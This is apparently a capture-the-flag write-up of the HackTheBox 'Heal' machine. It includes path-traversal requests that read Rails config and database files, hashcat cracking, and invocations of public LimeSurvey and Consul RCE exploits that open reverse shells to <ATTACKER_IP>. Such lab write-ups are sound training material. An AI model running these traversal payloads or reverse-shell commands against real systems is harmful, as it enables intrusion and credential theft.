All write-ups
6 min read

HackTheBox: Heal

HackTheBoxLinuxRuby on RailsPath DisclosureLimeSurveyConsul

HackTheBox: Heal

1. Reconnaissance & Vhost Enumeration

Initial scanning revealed standard web ports. To uncover hidden infrastructure, we fuzzed virtual hosts using gobuster.

gobuster vhost -u http://heal.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 50

Discovery: api.heal.htb Tech Stack: Rails 7.1.4, Ruby 3.3.5

Interacting with the application led to a survey endpoint, revealing another subdomain: take-survey.heal.htb. Directory brute-forcing on this new subdomain uncovered an administrative login panel.

gobuster dir -u http://take-survey.heal.htb/ -w /usr/share/wordlists/dirb/common.txt 
# Discovered: /admin -> /index.php/admin/authentication/sa/login

2. Path Disclosure & Database Extraction

Back on the main application, a PDF export function exhibited suspicious behavior. After generating a PDF, the application initiated a GET request to retrieve the file via a filename parameter.

GET /download?filename=export_123.pdf HTTP/1.1

Knowing the application runs Ruby on Rails, we targeted configuration files (config/database.yml) via a path traversal attack.

GET /download?filename=../../../config/database.yml HTTP/1.1

Extracted Configuration:

test:
  database: storage/test.sqlite3
production:
  database: storage/development.sqlite3

Using the traversal vulnerability again, we downloaded the SQLite database:

GET /download?filename=../../storage/development.sqlite3 HTTP/1.1

Analyzing the database yielded a bcrypt password hash for the user ralph.

hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show

Result: Cracked password: [REDACTED]

3. LimeSurvey Exploitation (Initial Access)

We authenticated to the take-survey.heal.htb administrative portal (/admin) using the credentials: ralph / [REDACTED].

The application was identified as LimeSurvey, vulnerable to CVE-2021-44967 (Authenticated RCE via plugin upload). Using a public exploit script, we established a reverse shell.

python limesurvey_rce.py -t http://take-survey.heal.htb/index.php/admin/authentication/sa/login -u ralph -p '[REDACTED]' --listen-ip <ATTACKER_IP> --listen-port 9001

Result: Shell as www-data.

4. Lateral Movement

Enumerating the filesystem, /etc/passwd revealed an interactive user named ron. Investigating the LimeSurvey web root (/var/www/limesurvey/application/config/config.php) exposed PostgreSQL database credentials:

'username' => 'db_user',
'password' => '[REDACTED]'

Due to credential reuse, the database password also granted SSH access for the user ron.

ssh ron@heal.htb
# Password: [REDACTED]

Result: Shell as ron. User flag secured.

5. Privilege Escalation

Checking internal listening ports on the host machine:

ron@heal:~$ ss -tulnp
...
tcp   LISTEN   127.0.0.1:8500
...

Port 8500/tcp corresponds to HashiCorp Consul. We utilized SSH local port forwarding to access the Consul API from our attacker machine.

ssh -L 8500:127.0.0.1:8500 ron@heal.htb

The running version of Consul was vulnerable to an authenticated RCE (Exploit-DB 51117). We executed the exploit against our forwarded port:

nc -nvlp 4444
python shell.py 127.0.0.1 8500 <ATTACKER_IP> 4444

Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).